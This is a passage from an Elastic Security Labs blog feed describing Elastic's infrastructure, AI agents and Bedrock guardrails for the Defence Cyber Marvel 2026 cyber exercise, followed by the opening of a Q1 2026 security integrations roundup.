      source  = &quot;cloudflare/cloudflare&quot;
      version = &quot;~&gt; 5.15.0&quot;
    }
  }

  backend &quot;s3&quot; {
    bucket  = &quot;elastic-terraform-state-dcm5&quot;
    key     = &quot;prod/terraform.tfstate&quot;
    region  = &quot;eu-west-2&quot;
    encrypt = true
  }
}
</code></pre>
<p>The total resource footprint managed by Terraform was substantial: one Elastic Cloud deployment with autoscaling, 40 Kibana Spaces, 120 Fleet agent policies (three per team), 400+ integration policies, 40 Kibana security roles, 40 Keycloak role mappings, ILM policies for data retention, 41 AWS IAM users for Bedrock GenAI connectors (one per team space plus a default), 41 Kibana GenAI action connectors, AWS Bedrock guardrails, Cloudflare Zero Trust tunnels for Tines access, Tines action connectors per team space, detection service accounts stored in HashiCorp Vault, and per-space Security Solution default index configuration. All state was stored in an encrypted S3 backend.</p>
<p>For the agent and proxy deployment onto the actual range systems, we used <a href="https://github.com/ClarifiedSecurity/catapult">Catapult</a>, an excellent open-source tool built by the team at Clarified Security. Catapult wraps Ansible with a container-based execution model that's purpose-built for cyber range deployments. It handled the installation and enrolment of Elastic Agents across the range infrastructure, the configuration of proxy servers (each team had a dedicated Squid proxy for its deployed network to simulate a single point of egress, as in the real world, with traffic routed through endpoints like <code>http://elastic-proxy.dsoc.XX.dcm.ex:3128</code>), and the deployment of Cloudflare tunnels for Tines connectivity.</p>
<p>During provisioning, Terraform wrote the following to HashiCorp Vault for Catapult to consume: credentials, enrolment tokens, API keys, proxy configurations, and Tines service account credentials. The Vault paths followed a consistent structure, such as <code>dcm/gt/elastic/prod/enrollment_tokens/BT-XX-Deployed</code> and <code>dcm/gt/elastic/tines-sa/tines-sa-btXX</code>, making it straightforward for the Catapult playbooks to pull the right credentials for each team.</p>
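<p>As a small illustration of how a provisioning script might derive those per-team paths, here is a hedged Python sketch. The <code>vault_paths</code> helper and the zero-padded team number are assumptions for illustration; only the two path patterns come from the exercise.</p>

```python
def vault_paths(team: int) -> dict:
    """Per-team Vault paths following the two patterns above.
    (Illustrative helper; zero-padded team numbers are an assumption.)"""
    bt = f"{team:02d}"
    return {
        "enrollment_token": f"dcm/gt/elastic/prod/enrollment_tokens/BT-{bt}-Deployed",
        "tines_service_account": f"dcm/gt/elastic/tines-sa/tines-sa-bt{bt}",
    }

print(vault_paths(7)["enrollment_token"])
# dcm/gt/elastic/prod/enrollment_tokens/BT-07-Deployed
```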
<h2>Training: setting teams up for success</h2>
<p>Deploying the platform is one thing; ensuring people can actually use it is another. We provided on-range, instructor-led training to the Blue Teams during the pre-exercise phase. This covered <a href="https://www.elastic.co/security">Elastic Security</a> fundamentals, navigating their team space in Kibana, working with the prebuilt detection rules, using Discover for log analysis and threat hunting, building custom dashboards, understanding Elastic Defend alerts, and getting familiar with the Timeline investigation tool.</p>
<p>The exercise instructions noted this training was optional but &quot;highly recommended,&quot; and from what we saw, the teams who attended hit the ground running on day one of execution. Training and enablement are just as important as the technology deployment itself. Handing a team enterprise-grade security tooling they don't know how to use wouldn't have helped anyone.</p>
<h2>The on-range AI service: compliant, audited, guardrailed</h2>
<p>This year marked our debut in providing AI access to the DCM range. We provided a compliant AI service directly on the range, backed by UK-tenanted AWS Bedrock models - specifically Claude 3.7 Sonnet running in the eu-west-2 (London) region. This wasn't AI for the sake of AI; it was a carefully architected service with guardrails, complete audit logging, and RBAC-aware access controls. We were trusted with running this service due to Elastic's experience in the AI space.</p>
<p>The AI service had multiple consumers on the range, and this is an important distinction. The compliant Bedrock connector we provisioned into each team's space wasn't just powering our custom agents - it also powered Elastic's native AI features, specifically:</p>
<h3>Elastic AI Assistant for Security</h3>
<p>The <a href="https://www.elastic.co/docs/solutions/security/ai/ai-assistant">Elastic AI Assistant</a> was available in every Blue Team space, connected to our on-range Bedrock connector. This gave teams a context-aware chat interface directly within Elastic Security where they could ask questions about their alerts, get help writing ES|QL queries, investigate suspicious processes, and get guided remediation steps. The AI Assistant uses Retrieval-Augmented Generation (RAG) with Elastic's Knowledge Base feature, which is pre-populated with articles from <a href="https://www.elastic.co/security-labs">Elastic Security Labs</a>. Teams could also add their own documents, such as range-specific SOPs, threat intel, or team notes, to the Knowledge Base to further ground the assistant's responses in their operational context.</p>
<p>What made this particularly valuable in the exercise context was the AI Assistant's ability to help less experienced analysts understand what they were looking at. A junior analyst facing their first live implant beacon could ask the assistant to explain the alert, suggest investigation steps, and even help draft the incident report. The data anonymisation settings ensured that sensitive field values could be obfuscated before being sent to the LLM provider.</p>
<h3>Elastic Attack Discovery</h3>
<p><a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> was another significant consumer of our on-range AI service. Attack Discovery uses LLMs to analyse alerts in a team's environment and identify threats by correlating alerts, behaviours, and attack paths. Each &quot;discovery&quot; represents a potential attack and describes relationships among multiple alerts - telling teams which users and hosts are involved, how alerts map to the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/mitre-attack-coverage">MITRE ATT&amp;CK matrix</a>, and which threat actor might be responsible.</p>
<p>For a cyber exercise in which Red Teams actively launched coordinated attacks, Attack Discovery was transformative. Instead of manually triaging hundreds of individual alerts, Blue Teams could run Attack Discovery to surface the high-level attack narratives, for example, &quot;these 15 alerts are all part of a lateral movement chain from host X to host Y, likely by threat actor Z&quot;, and focus their investigation time where it mattered most. It's the kind of capability that directly reduces mean time to respond, and fights alert fatigue, which is precisely what you need when you're under sustained attack for five days straight.</p>
<h2>The custom AI agents: Elastic Agent Builder</h2>
<p>Beyond the native Elastic AI features, we built three bespoke AI agents using <a href="https://www.elastic.co/elasticsearch/agent-builder">Elastic Agent Builder</a>. Agent Builder is Elastic's framework for building custom AI agents that combine LLM instructions with modular, reusable tools, each tool being an ES|QL query, a built-in search capability, workflow execution, or an external integration via MCP. Agents parse natural language requests, select the appropriate tools, execute them, and iterate until they can provide a complete answer, all while managing context with data inside Elasticsearch. You can read more about the framework in the <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder documentation</a> and the <a href="https://www.elastic.co/search-labs/blog/elastic-ai-agent-builder-context-engineering-introduction">Elasticsearch Labs deep dive</a>.</p>
<p>The three key components of Agent Builder that we leveraged were:</p>
<p><strong>Agents:</strong> Custom LLM instructions and a set of assigned tools that define the agent's persona, capabilities, and behaviour boundaries. Each agent has a system prompt that controls its mission, the tools it can access, and the structure of its responses.</p>
<p><strong>Tools:</strong> Modular functions that agents use to search, retrieve, and manipulate Elasticsearch data. We built custom ES|QL tools that queried specific indices containing exercise documentation, playbooks, and reports.</p>
<p><strong>Agent Chat:</strong> The conversational interface - both the built-in Kibana UI and the programmatic API - that participants used to interact with the agents.</p>
<p>Agent and tool configurations are defined as JSON and managed via the Agent Builder APIs, making the entire agent lifecycle - from prompt engineering to tool binding - reproducible and version-controllable. We'll share the GrantPT agent configuration and tool definitions in a follow-up post for those who want to replicate this approach - watch this space.</p>
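<p>To make that concrete, here is a hedged sketch of what such declarative definitions can look like, expressed as Python dictionaries serialised to JSON. The field names (<code>id</code>, <code>type</code>, <code>instructions</code>, <code>tools</code>, <code>params</code>) are illustrative assumptions rather than the documented Agent Builder schema; the parameterised ES|QL mirrors the knowledge base tool shown later in this post.</p>

```python
import json

# Illustrative agent + tool definitions. Field names are assumptions,
# not the documented Agent Builder schema.
tool = {
    "id": "dcm5-knowledge-search",
    "type": "esql",
    "query": (
        "FROM dcm5-grantpt-* METADATA _score, _index\n"
        "| WHERE _index == ?target_index\n"
        "| WHERE content: ?query\n"
        "| SORT _score DESC\n"
        "| LIMIT 10"
    ),
    "params": {
        "target_index": {"type": "keyword"},
        "query": {"type": "text"},
    },
}

agent = {
    "id": "grantpt",
    "instructions": "You are GrantPT, the exercise assistant. "
                    "Contextualise answers to the user's role.",
    "tools": [tool["id"]],  # bind tools by ID, no application code needed
}

print(json.dumps(agent, indent=2))
```

Because both objects are plain JSON, they can live in version control and be pushed through the Agent Builder APIs as part of the same pipeline that manages the rest of the infrastructure.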
<p>Here's what each agent did:</p>
<h3>1. GrantPT - The general-purpose assistant</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image5.png" alt="" /></p>
<p>Available to all ~2,500 exercise participants, GrantPT was our primary AI agent and the best demonstration of how straightforward Agent Builder makes it to stand up a capable, domain-specific assistant. The agent's configuration consisted of a JSON object defining its system prompt, persona, and an array of bound tool IDs - that's it. No custom application code, no bespoke API layer, just declarative configuration.</p>
<p>What gave GrantPT its depth was the tooling. We defined a mix of built-in platform tools and custom ES|QL tools, each registered with a description, a parameterised query, and typed parameter definitions. For example, the knowledge base tool accepted a <code>target_index</code> and a semantic <code>query</code> parameter, executing a parameterised ES|QL query against our <code>dcm5-grantpt-*</code> indices with semantic search ranking:</p>
<pre><code>FROM dcm5-grantpt-* METADATA _score, _index
| WHERE _index == ?target_index
| WHERE content: ?query
| SORT _score DESC
| LIMIT 10
</code></pre>
<p>A separate index discovery tool let the agent dynamically enumerate available knowledge base indices at the start of each conversation, meaning we could add new documentation indices during the exercise without reconfiguring the agent; it would simply discover them on the next interaction.</p>
<p>We also built a Jira integration tool that performed semantic search across ingested helpdesk tickets, enabling GrantPT to surface relevant troubleshooting context from prior support requests. This was particularly useful for the HelpDesk Analysts, who could ask GrantPT about recurring issues and get responses grounded in actual ticket history rather than generic guidance.</p>
<p>The RBAC-tailored response behaviour came from a combination of the agent's system prompt, which instructed it to contextualise answers based on the user's role, and the underlying Elasticsearch security model. Because each tool's ES|QL query is executed within the user's security context, the agent can only surface documents accessible to the user's role. A Blue Team member asking about exercise procedures would get results scoped to their team's accessible indices, whilst a HelpDesk Analyst would see results from helpdesk-specific indices. The agent didn't need explicit role-switching logic; Elasticsearch's native document-level security handled scoping, and the agent simply worked with whatever results were returned. This is one of the things that makes Agent Builder genuinely elegant - by inheriting Elasticsearch's security model, you get RBAC-aware AI without writing a single line of authorisation code.</p>
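<p>The effect of that inherited security model can be shown with a toy simulation. This is illustrative Python, not Elastic code: in reality the scoping is enforced by Elasticsearch roles and document-level security, not an application-level filter, and the index names beyond the <code>dcm5-grantpt-*</code> pattern are made up.</p>

```python
# Toy simulation: the search layer filters by the caller's role, so the
# agent just consumes whatever comes back -- no role-switching logic needed.
DOCS = [
    {"index": "dcm5-grantpt-blueteam", "content": "Blue Team SOPs", "roles": {"blue"}},
    {"index": "dcm5-grantpt-helpdesk", "content": "Ticket history", "roles": {"helpdesk"}},
    {"index": "dcm5-grantpt-shared", "content": "Exercise schedule", "roles": {"blue", "helpdesk"}},
]

def search(query: str, caller_role: str) -> list:
    """Return only documents the caller's role may read."""
    return [d["content"] for d in DOCS
            if caller_role in d["roles"] and query.lower() in d["content"].lower()]

print(search("exercise", "blue"))   # ['Exercise schedule']
print(search("ticket", "blue"))     # [] -- the helpdesk-only index is invisible
```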
<h3>2. REDRock - The adversary's companion</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image7.png" alt="" /></p>
<p>This agent was exclusively available to Red Teams. REDRock followed the same Agent Builder pattern, a dedicated system prompt defining its adversarial persona, bound to its own set of custom ES|QL tools querying Red Team-specific indices. These indices contained the Red Team playbooks, Tuoni C2 documentation, known system vulnerabilities within the range environment, and information about deployed services. The tool definitions mirrored the same parameterised semantic search pattern used by GrantPT, but were scoped to indices accessible only to Red Team roles. Red Team operators could query attack vectors, check for known weaknesses in target systems, and get contextual guidance on their operational plans. It was, quite frankly, like giving the attackers an extremely well-briefed operations officer.</p>
<h3>3. RefPT - The referee's tool</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image2.png" alt="" /></p>
<p>Built specifically for the White Team (the exercise referees and assessors), RefPT was bound to tools querying indices containing Blue Team reports, scenario events, and the scoring criteria. Its purpose was to ensure uniform and fair scoring across all 40+ teams. The agent's system prompt was tuned to cross-reference submitted reports against known scenario events and scoring rubrics, helping assessors identify inconsistencies or gaps. When you've got assessors evaluating dozens of teams simultaneously, having an AI that can correlate reports against a structured scoring index is genuinely transformative for consistency.</p>
<h3>Tines: AI-powered workflow automation</h3>
<p>Tines was also a consumer of the on-range AI service. Each Blue Team had a dedicated Tines instance, with Tines action connectors provisioned in their Kibana space. Tines could leverage the Bedrock-backed AI capabilities for intelligent workflow automation, such as automated alert enrichment, AI-assisted triage decisions, natural-language summaries in notification workflows, and natural-language workflow creation. The Tines connector was configured per-team with credentials stored in Vault:</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;tines_bt&quot; {
  count = var.team_count

  name              = &quot;BT-${local.team_numbers[count.index]}-Tines&quot;
  connector_type_id = &quot;.tines&quot;
  space_id          = local.space_ids[count.index]

  config = jsonencode({
    url = &quot;https://tines.dsoc.${local.team_numbers[count.index]}.dcm.ex/&quot;
  })
}
</code></pre>
<h3>Ensuring compliance: Guardrails and audit</h3>
<p>Every AI interaction across all of these consumers was governed by strict AWS Bedrock Guardrails. We deployed guardrails with content filtering (hate, insults, sexual content, and violence at MEDIUM thresholds), PII protection (blocking email addresses, phone numbers, names, addresses, UK National Insurance numbers, credit card numbers, and IP addresses), topic-based filtering to prevent discussion of actual classified operations, and profanity filtering. Here's a snippet of the guardrail configuration from our Terraform:</p>
<pre><code>resource &quot;aws_bedrock_guardrail&quot; &quot;dcm5_elastic&quot; {
  name        = &quot;dcm5-prod-elastic-guardrail&quot;
  description = &quot;Guardrails for DCM5 Prod Elastic Kibana GenAI connectors&quot;

  content_policy_config {
    filters_config {
      input_strength  = &quot;MEDIUM&quot;
      output_strength = &quot;MEDIUM&quot;
      type            = &quot;HATE&quot;
    }
    # ... additional content filters for INSULTS, SEXUAL, VIOLENCE
  }

  sensitive_information_policy_config {
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;UK_NATIONAL_INSURANCE_NUMBER&quot;
    }
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;IP_ADDRESS&quot;
    }
    # ... additional PII filters
  }

  topic_policy_config {
    topics_config {
      name       = &quot;classified-information&quot;
      definition = &quot;Discussions about actual classified operations, current real-world military activities, or operational intelligence.&quot;
      type       = &quot;DENY&quot;
    }
  }
}
</code></pre>
<p>Each Blue Team space had its own IAM user for Bedrock access, and the <code>genAiSettings:defaultAIConnectorOnly</code> Kibana setting was enforced to prevent teams from configuring their own connectors. This meant every single API call could be traced back to a specific team via CloudWatch, and the NSOC had complete audit visibility. The CloudWatch log group <code>/aws/bedrock/grantpt-prod/invocations</code> captured every invocation and guardrail event.</p>
<p>The numbers for all AI consumers speak for themselves: three custom AI agents, 2,797 conversations, and 785 million AI tokens consumed throughout the exercise.</p>
<h2>In-game real-time monitoring</h2>
<p>Within the exercise scenario, each team had access to RocketChat as their on-range messaging client. Every Blue Team got its own channel, the ability to direct message anyone in the exercise, and the freedom to spin up new channels as needed. Most critically for DCM tradition, this included the memes channel - the spiritual backbone of all inter-team ribbing and the creative morale-boosting humour that inevitably emerges when you put a few thousand cyber operators under pressure for a week.</p>
<p>All of this communication data represented a brilliant real-time window into range health, team sentiment, and the topics trending across the exercise. It felt too good to pass up, so we ingested the entire RocketChat conversation corpus into Elastic in real time and put it to work.</p>
<h3>Sentiment analysis and named entity recognition</h3>
<p>For named entity recognition, we deployed the <a href="https://huggingface.co/dslim/bert-base-NER">dslim/bert-base-NER</a> model from Hugging Face into a machine learning node on the NSOC deployment using the <a href="https://www.elastic.co/guide/en/elasticsearch/client/eland/current/index.html">Elastic ELAND client</a>. This was then wired into an Elasticsearch ingest pipeline that every RocketChat message passed through on ingestion. We took the extracted entities and surfaced the most common ones as dashboard themes, giving us a live view of the ebb and flow of conversation topics throughout the exercise.</p>
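<p>As a rough sketch of the wiring, the pipeline amounts to an <code>inference</code> processor pointing at the imported model. The pipeline and field names below are assumptions; the processor shape follows Elasticsearch's documented inference processor, and Eland imports Hugging Face models under IDs like <code>dslim__bert-base-ner</code>.</p>

```python
import json

# Hedged sketch of an ingest pipeline that runs each RocketChat message
# through the deployed NER model. Pipeline/field names are assumptions.
pipeline = {
    "description": "NER enrichment for RocketChat messages (illustrative)",
    "processors": [
        {
            "inference": {
                "model_id": "dslim__bert-base-ner",   # Eland-imported model ID
                "target_field": "ml.ner",             # where entities land
                "field_map": {"message": "text_field"},
            }
        }
    ],
}

print(json.dumps(pipeline, indent=2))
```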
<p>We also analysed group activity, user statistics, and general communication patterns to build a picture of life patterns for each team - most active participants, message volume over time, and sentiment trends pivoted by individual users. All told, it gave us some genuinely interesting insight into what was happening on the range in near real time. When we switched Elastic Agent into Prevent mode, for instance, a word cloud on our dashboard immediately lit up with &quot;Elastic&quot; as the most discussed theme across all channels - Blue Teams discussing its effectiveness, Red Teams lamenting their lost beacons. Rather satisfying, that.</p>
<h3>Meme analysis (yes, really)</h3>
<p>Finally - and this one raised a few eyebrows - we pulled every meme submitted to the channels, vectorised the images, and ran nearest-neighbour evaluations to cluster similar memes and topics together. We also passed them through the zero-shot NER inference model to generate thematic descriptions of each meme's content. The logic was that these outputs might prove useful later for filtering, moderation, or other in-game interactions. Whether the meme analysis yielded operationally critical intelligence is debatable. Whether it was good fun is not.</p>
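<p>The clustering primitive here is plain nearest-neighbour search over image embeddings. A toy sketch with made-up three-dimensional vectors (real image embeddings are far higher-dimensional, and the filenames are invented):</p>

```python
from math import sqrt

# Made-up embeddings standing in for vectorised meme images.
EMBEDDINGS = {
    "beacon_down.png":   [0.9, 0.1, 0.0],
    "beacon_rip.png":    [0.8, 0.2, 0.1],
    "blue_team_win.png": [0.1, 0.9, 0.2],
}

def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (sqrt(sum(x * x for x in a)) * sqrt(sum(y * y for y in b)))

def nearest(name):
    """Most similar other meme by cosine similarity -- the clustering primitive."""
    return max((m for m in EMBEDDINGS if m != name),
               key=lambda m: cosine(EMBEDDINGS[name], EMBEDDINGS[m]))

print(nearest("beacon_down.png"))  # beacon_rip.png
```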
<h2>Nipping problems in the bud</h2>
<p>As much as we hoped everything would run smoothly during exercise week, things inevitably break, aren't fully understood, or need further customisation to suit how a particular team wants to use them. For this, we had our own subsection of the in-range helpdesk where Elastic and GenAI-specific requests could be raised by any team.</p>
<p>We manned this helpdesk for the entire duration of the exercise, providing guidance, documentation, issue debugging, and range-specific recommendations. That last point is worth expanding on. Sometimes, what a Blue Team was seeing in Elastic wasn't actually an Elastic problem at all, but rather Elastic faithfully surfacing something on the range that warranted further investigation (Red Teams can cause absolute mayhem, and the telemetry doesn't lie). Over the course of the exercise, we handled 125 individual support requests from teams specifically asking for help from us at Elastic.</p>
<h3>Pre-emptive debugging with Tines</h3>
<p>Beyond visiting teams via VTC or in person at EXCON, we also worked with <a href="https://www.tines.com/partners/elastic-security/">Tines</a> to try something a bit more proactive. We pulled the ticket body from incoming requests, attempted to categorise the problem, ran the categorisation against our corpus of previously resolved tickets, and had GenAI produce a summarised first-pass response aimed at solving the user's issue before triage brought it to our queue.</p>
<p>This is actually a pattern we borrowed from our own <a href="https://www.elastic.co/blog/elastic-wins-2025-best-use-of-ai-for-assisted-support">support organisation at Elastic</a>, where we provide a similar capability using our extensive knowledge base of previously solved issues as a repository for supporting AI Agent context. The idea is straightforward: use past solutions to give a machine-generated, informed first stab at resolving a problem, and short-circuit the need for a support engineer to pick up every ticket manually. It didn't solve everything; some issues genuinely needed a human with range context, but it meaningfully reduced the queue pressure and got faster answers to the teams who needed them. This was such a success with our own specific tickets and queue that we actually extended the remit to the entire helpdesk in the latter part of the exercise, helping to reduce the load on the other groups in the Green team supporting the exercise.</p>
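<p>A toy sketch of the matching step. The real workflow ran in Tines with GenAI summarisation; this just shows the underlying idea of grounding a first-pass answer in previously resolved tickets, with invented ticket text and a crude word-overlap score standing in for semantic search.</p>

```python
# Invented corpus of previously resolved tickets (illustrative only).
RESOLVED = [
    {"ticket": "agent not enrolling proxy settings missing",
     "fix": "Set the Squid proxy in the agent policy."},
    {"ticket": "kibana login fails via keycloak role mapping",
     "fix": "Re-map the Keycloak role to the team space."},
]

def first_pass(new_ticket: str) -> str:
    """Return the fix from the most similar resolved ticket (word overlap)."""
    words = set(new_ticket.lower().split())
    best = max(RESOLVED, key=lambda t: len(words & set(t["ticket"].split())))
    return best["fix"]

print(first_pass("elastic agent is not enrolling behind the proxy"))
# Set the Squid proxy in the agent policy.
```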
<h2>Industry partnerships: Better together</h2>
<p>One of the things we're most proud of is how our partnership ecosystem has grown year on year. DCM is not just an Elastic show; it's a genuine coalition of industry partners, each bringing something unique to the security platform.</p>
<p><strong>Year 1 (DCM2)</strong> - Elastic joined as an industry partner, providing the security monitoring and endpoint detection platform.</p>
<p><strong>Year 2 (DCM3)</strong> - We brought in Endace, providing 1:1 packet capture capability. Full packet capture alongside Elastic's network visibility gave teams the ability to conduct deep-dive forensics that log-based analysis alone can't provide.</p>
<p><strong>Year 3 (DCM4)</strong> - Tines joined the family, bringing workflow automation to the table. Blue Teams could now build automated response playbooks, triage workflows, and notification chains, all integrated directly into their Elastic environment via the native Tines connector.</p>
<p><strong>Year 4 (DCM26, formerly DCM5)</strong> - AWS came on board, providing Bedrock access for our AI agents and contributing funding towards the Elastic deployments. This was a significant milestone; having a hyperscaler directly invested in the exercise's success unlocked capabilities (such as compliant, UK-tenanted AI inference with full guardrails and audit logging) that simply wouldn't have been possible otherwise. Tines' integration this year was also enhanced by the addition of on-range access to LLMs. The DCM series also reached a milestone this year, transitioning from its origins as an Army Cyber Association initiative to an officially funded programme under Cyber and Specialist Operations Command.</p>
<p><strong>To the teams at Endace, Tines, and AWS - sincere thanks. This exercise is better because of your contributions, and all Teams are better equipped because of the platform we've built together. We're already planning for DCM27. Cheers to the lot of you.</strong></p>
<h2>Culture, highlights, and the bits that make it worthwhile</h2>
<h3>The Challenge Coins</h3>
<p>We had custom challenge coins minted for DCM26. If you know, you know. Challenge coins are a long-standing military tradition, and having one made for the exercise felt like the right way to mark our fourth year of involvement.</p>
<h3>The cocktail party</h3>
<p>We were also grateful to be invited to the High Commission cocktail party hosted by the British High Commissioner to Singapore. There's something quite surreal about discussing Elasticsearch shard counts and Terraform state management whilst holding a gin and tonic at the ambassador's invitation. It was a brilliant evening, a genuine reminder that these exercises exist at the intersection of technology and diplomacy, and that the relationships built here extend well beyond the technical.</p>
<h2>Wrapping up</h2>
<p>The multi-tenanted architecture proved itself under sustained load; the native Elastic AI features (<a href="https://www.elastic.co/elasticsearch/ai-assistant">AI Assistant</a> and <a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a>) gave teams capabilities that would have been science fiction a few years ago; and the custom AI agents exceeded our expectations for adoption. The partnership model continues to demonstrate that industry involvement in defence exercises creates outcomes that no single organisation could achieve alone.</p>
<p>Defence Cyber Marvel 2026 was a landmark iteration of an exercise that continues to grow in ambition, complexity, and impact. For Elastic, being trusted to provide the core defensive security platform for 40 Blue Teams from 29 nations, and this year, the AI capability as well, is something we don't take lightly. The exercise develops real skills for real people who will go on to defend real networks, and being a part of that mission is genuinely meaningful.</p>
<p>As the <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government's press release</a> put it, DCM demonstrates the practical value of real-life scenarios that reinforce international partnerships. We couldn't agree more.</p>
<p>We'll be back next year, and I suspect we'll have even more to talk about. In the meantime, we'll continue to improve the product so that support for environments such as Defence Cyber Marvel excels year over year.</p>
<p>See you on the range.</p>
<p>Follow the DCM26 story on social media:</p>
<p><a href="https://www.facebook.com/RSIGNALS/posts/last-week-defence-cyber-marvel-2026-based-in-singapore-brought-together-2500-par/1338105391677347/">Facebook</a> | <a href="https://www.linkedin.com/posts/uk-in-singapore_defence-cyber-marvel-2026pdf-activity-7426505462310752258-1aHq?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABiQ31MBIbDwn5LYMrolM4rznGQcLabrY9A">LinkedIn</a> | <a href="https://www.instagram.com/p/DU00Y1jCKbr/">Instagram</a></p>
<h2>Further reading</h2>
<p><em>Elastic Security &amp; AI</em></p>
<ul>
<li><a href="https://www.elastic.co/security">Elastic Security</a> - The platform powering the Blue Team deployments</li>
<li><a href="https://www.elastic.co/elasticsearch/ai-assistant">AI Assistant for Security</a> - Context-aware AI chat within Elastic Security</li>
<li><a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> - LLM-powered alert correlation and threat narrative generation</li>
<li><a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder</a> - Framework for building custom AI agents with Elasticsearch</li>
</ul>
<p><em>Infrastructure &amp; Tooling</em></p>
<ul>
<li><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a> - Infrastructure as Code for the Elastic Stack</li>
<li><a href="https://www.elastic.co/docs/reference/fleet">Elastic Fleet Guide</a> - Centrally managing Elastic Agents at scale</li>
<li><a href="https://github.com/ClarifiedSecurity/catapult">Catapult by Clarified Security</a> - Ansible-based cyber range provisioning</li>
</ul>
<p><em>Exercise Context</em></p>
<ul>
<li><a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government DCM26 Press Release</a> - Official overview of the exercise</li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/elastic-defence-cyber-marvel.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic Security Integrations Roundup: Q1 2026]]></title>
            <link>https://www.elastic.co/security-labs/elastic-security-integrations-roundup-q1-2026</link>
            <guid>elastic-security-integrations-roundup-q1-2026</guid>
            <pubDate>Sat, 04 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs announces nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.]]></description>
            <content:encoded><![CDATA[<h2>A quarterly look at Elastic’s security integrations ecosystem</h2>
<p>Security teams can only protect what they can see. Gaps in coverage, like a macOS fleet generating logs that never reach your SIEM, an email gateway running in isolation, or a cloud environment producing findings that stay siloed in the vendor console, are easily exploited by attackers.</p>
<p>Elastic’s answer to this is continuous and open investment in third-party integrations, built on the belief that a strong security ecosystem requires deep integrations that make data from every corner of the stack searchable and contextualized. Today, we’re announcing nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.</p>
<p>Each integration ships with ingest pipelines that normalize and structure data out of the box, along with prebuilt dashboards that serve as an immediate starting point for visualization and analysis, so teams can search, correlate and investigate across new data sources from day one without writing or maintaining parsers.</p>
<h2>macOS Security Events</h2>
<p>Elastic Defend, the native integration that delivers Elastic Endpoint Security, collects rich security telemetry on macOS, but it is intentionally focused on high-value detection signals rather than full system auditing. Login and logout events, account creation and deletion, service registration changes and application diagnostic logs all live outside that scope, leaving threat hunters and IR teams without complete macOS context. The macOS Security Events integration complements Elastic Defend, providing the same depth of OS-level visibility offered to Windows devices via the Windows Event Logs integration.</p>
<p>A single macOS endpoint generates tens of thousands of unified log entries. Left unfiltered, that volume creates noise rather than signal. This integration ships with predicate-based filters that scope ingestion to security-relevant events: authentication activity, process execution, network connections, file system changes, and system configuration modifications.</p>
<p>These predicate-based filters enable comprehensive macOS coverage without the cost or complexity of ingesting everything. Once ingested, these events are immediately available to Elastic Security’s AI Assistant. Analysts can ask natural-language questions like &quot;Show me all privilege escalation attempts on macOS endpoints in the last 24 hours&quot; or &quot;Summarize login failures for this host&quot;, turning raw unified log entries into actionable investigation context without writing a single query.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/macos">macOS Security Events</a> integration.</p>
<h2>IBM QRadar</h2>
<p>For teams running IBM QRadar in parallel with Elastic Security, alert ingestion into Elastic has become easier. The QRadar integration collects offense records from QRadar’s offense and rules endpoints, enriching each alert with the triggering rule’s name, ID, type and ownership, so analysts can triage in Elastic without switching back to QRadar.</p>
<p>This integration is the foundation of Elastic’s SIEM migration workflow for QRadar, which mirrors the capability already available for <a href="https://www.elastic.co/docs/reference/integrations/splunk">Splunk</a>. Teams can also use <a href="https://www.elastic.co/security-labs/from-qradar-to-elastic">Automatic Migration</a> for migrating their QRadar rules into Elastic. It uses semantic search and generative AI to map existing rules to Elastic’s 1,300+ prebuilt detections, and translates anything that doesn’t map directly into ES|QL, allowing you to consolidate your SIEM footprint without manually rebuilding your entire detection library.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/ibm_qradar">IBM QRadar</a> integration.</p>
<h2>Proofpoint Essentials</h2>
<p>For enterprise customers, Proofpoint’s Targeted Attack Protection (TAP) integration has been available in Elastic. To provide the same email threat visibility to SMB environments and the MSPs and MSSPs who serve them, Proofpoint Essentials is now available.</p>
<p>The Proofpoint Essentials integration streams four event types into Elastic Security:</p>
<ul>
<li>Clicks on malicious URLs that were blocked</li>
<li>Clicks that were permitted</li>
<li>Messages blocked for containing threats recognized by URL Defense or Attachment Defense</li>
<li>Messages delivered despite containing those threats</li>
</ul>
<p>To easily surface this data, two prebuilt dashboards are available:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image2.png" alt="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image1.png" alt="Threat Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Threat Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p>For an SMB SOC team, this means phishing attempts, malware detections and policy violations land in the same platform as the rest of your security telemetry, removing the need to switch platforms to understand the full context of a threat.</p>
